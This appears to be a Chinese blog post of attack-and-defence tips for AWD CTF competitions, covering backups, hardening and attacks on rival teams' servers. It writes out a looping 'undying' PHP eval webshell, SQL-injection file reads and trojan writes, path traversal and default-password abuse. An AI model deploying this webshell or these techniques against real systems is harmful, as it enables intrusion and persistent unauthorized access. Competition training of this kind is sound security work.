AWD攻防技巧(水文)
1.数据备份
比赛开始第一时间备份,备份网站目录及数据库,一般在 /var/www/html 目录。
一是为了dump下来,用D盾查杀存在的后门;安装sublime全文搜索关键字
二是为了比赛出现异常或恶意破坏进行还原,避免靶机宕机被扣分;
三要审计下有没有高危命令执行函数,进行后期加固,以及有空余时间或专门安排一个人审计下基础漏洞用来做攻击。
命令执行函数 exec()、passthru()、system()、 shell_exec()、popen() 等;代码执行函数:eval()、assert()、preg_repace()、uasort() 等;文件包含函数 include() 、require() 等,用正则匹配 grep -r "@eval" /www/,找到后注释掉。
1.备份源码,注意隐藏文件使用图像化工具连接ssh后,推荐用winscp,准备centos7.9lamp、ubuntu20.04lamp
tar czvf newfile.tar.gz SOURCE 压缩 zxvf
2.备份数据库, 1)本地还原 2)查看后台账号密码 3)查看关闭数据库远程,推荐adminer.php
mysqldump –u root –p mydatabase > mydatabase_out.sql;
3.恢复备份,在mysql终端下执行:
命令格式:source FILE_PATH
source ~/db.sql
或者在shell下执行
shell> mysqldump -h host -u root -p dbname < dbname_backup.sql
2.弱口令
大多数情况下,所有队伍的Web后台、phpmyadmin等服务的管理密码都一样,立马快速检查修改自己密码,并利用此进行攻击。一般默认密码为 admin/admin, admin/123456, test/test,如果被其他队伍改了那就gg了。
3.查找后门
对备份web目录进行后门查杀,脚本获取webshell并快速提交
4.监测攻击payload
tail -f *.log,看日志,不言而喻,抓他们的payload并利用。
5.常见漏洞
常见的漏洞包括SQL注入、文件包含、文件上传、命令执行等。
(1)sql注入漏洞
比赛一般没有防护(除非选手安装了防御脚本),可直接通过 --sql-shell 执行 select load_file(‘/flag’); 得到flag,也可以利用 into outfile 写木马维持权限。
(2)本地文件包含或目录遍历
直接通过 ../../../../../flag 获取。
6.权限维持
(1)不死马
直接linux执行:
while true;do echo '<?php eval($_POST["x"]);?>' > x.php;sleep 1;done
7.防御方法
- waf
- 文件监控
- 克制不死马、内存马
使用条件竞争的方式,不断循环创建和不死马同名的文件和文件夹
8.批量反弹shell
Reverse Shell Manager
9.批量文件上传
https://github.com/edwardchoijc/ctf-toolkit/tree/master/batch_upload_file
AWD攻防技巧(水文)相关推荐
- 浅谈AWD攻防赛的生存攻略
AWD 规则 AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层.系统层.中间件层等),利用漏洞 ...
- CTF线下AWD攻防模式的准备工作及起手式
作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽 我自己在服务器上搭了一个cms来模拟AWD场景. 0X01 改ssh密码 官方在给出服务器密 ...
- CTF线下AWD攻防步骤总结
Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...
- CTF线下赛AWD攻防准备
CTF线下赛AWD攻防准备 最近发现一篇博客.感觉对CTF线下赛-AWD模式,总结比较好.于是学习了解了一下,为了方便寻找,把这篇博客复制了过来,并补充了点... 1.赛制流程:攻防模式(AWD)常见 ...
- ctf线下AWD攻防赛学习笔记
Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...
- 安卓刷量技术揭秘(二) 高级攻防技巧
标 题: [原创]安卓刷量技术揭秘(二) 高级攻防技巧 作 者: ckis 时 间: 2016-10-02,00:28:27 链 接: http://bbs.pediy.com/showthread. ...
- 黑客攻防技巧:2分钟入侵网站全程实录(组图)
说起流光.溯雪.乱刀,可以说是大名鼎鼎无人不知无人不晓,这些都是小榕哥的作品.每次一提起小榕哥来,我的崇拜景仰就如滔滔江水,连绵不绝 ~~~~(又来了!) 让我们崇拜的小榕哥最新又发布了SQL注入工具 ...
- AWD线下攻防平台搭建
AWD线下攻防平台搭建 步骤索引 AWD线下攻防平台搭建 换源 先将更新源备份一下 在命令行打开sources.list 修改sources.list文件,这里选择改成阿里镜像源 更新 升级 清理安装 ...
- AWD 线下攻防生存之道(Web 方向)
随着网络安全的热门,CTF 比赛也如春笋般崛起.AWD 无疑使 CTF 比赛中最有趣的环节.本 Chat 讲会讲解 AWD 线下比赛中的攻防之道,带你快速的入门 AWD 攻防,体会"HACK ...
最新文章
- python导入txt为dataframe-Python提取TXT数据转化为DataFrame
- 【转】ASP中的SQL注入
- PST文件的读取(待整理)
- CSS基础笔记(w3school)
- hbasehlog_HBase原理--RegionServer核心组件之HLog
- 嘉年华专访 | 我有故事,你有酒吗?
- 毕业论文范文计算机,计算机毕业论文范文参考
- windows server 2008远程桌面轻松搞定
- javascript之dom详细笔记加练习
- laravel 自定义函数
- Mysql学习之三. NLJ和BLN介绍
- 学无止境,京东活动自动领取脚本
- 深入浅出计算机组成原理:冒险和预测(一)-hazard是“危”也是“机(第22讲)...
- 蓝桥杯2018年真题(4)动态规划摔手机
- AI绘画绘图流量主小程序开发
- 借助Docker hub自己手动制作镜像(以Nginx镜像为例)
- 人工智能大作业——五子棋
- Service ‘MongoDB Server‘ (MongDB) failed to start. Verify that you have sufficient privileges to...
- Android-Ble蓝牙开发Demo示例–扫描,连接,发送和接收数据
- SpringCloud(H版以及Alibaba版本)的学习笔记(三)